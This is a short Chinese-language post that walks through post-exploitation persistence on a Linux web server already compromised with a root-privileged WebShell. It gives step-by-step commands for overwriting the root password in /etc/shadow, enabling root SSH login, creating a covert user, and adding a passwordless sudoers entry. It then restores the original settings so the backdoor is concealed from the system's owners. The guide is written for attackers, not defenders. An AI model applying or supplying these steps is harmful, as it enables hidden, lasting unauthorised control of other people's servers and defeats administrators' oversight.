没啥技术含量，一种思路，让某些得到Root权限WebShell的同学可以快点拿到权限。

　　某日拿到某站WebShell，RedHat(红旗linux)系统，Tomcat程序是Root身份启动的，WebShell当然也拥有Root权限。

　　具体提权思路：

　　1.WebShell直接替换Root密码：/etc/shadow    //记得备份

　　2.允许Root通过ssh登陆：

　　修改：/etc/ssh/sshd_config

　　PermitRootLogin yes   #允许Root登陆

　　3.重启ssh服务：service ssh restart

　　4.以Root身份登陆ssh，增加一个用户：

　　useradd application

　　passwd    //根据提示设置密码

　　5.更改application用户运行su不需密码：

　　chmod +w /etc/sudoers    //增加写入权限，默认只读

　　修改：/etc/sudoers

　　vi /etc/sudoers

　　加入：application   ALL=(ALL)        NOPASSWD: ALL

　　6.把Root密码修改回原样，禁止Root登陆。并去除sudoers的写属性(chmod -w /etc/sudoers)。

　　7.当然最后还要：chmod -w /etc/sudoers

Root用户登陆。

普通用户登陆，su免密码进入Root权限。

linux Webshell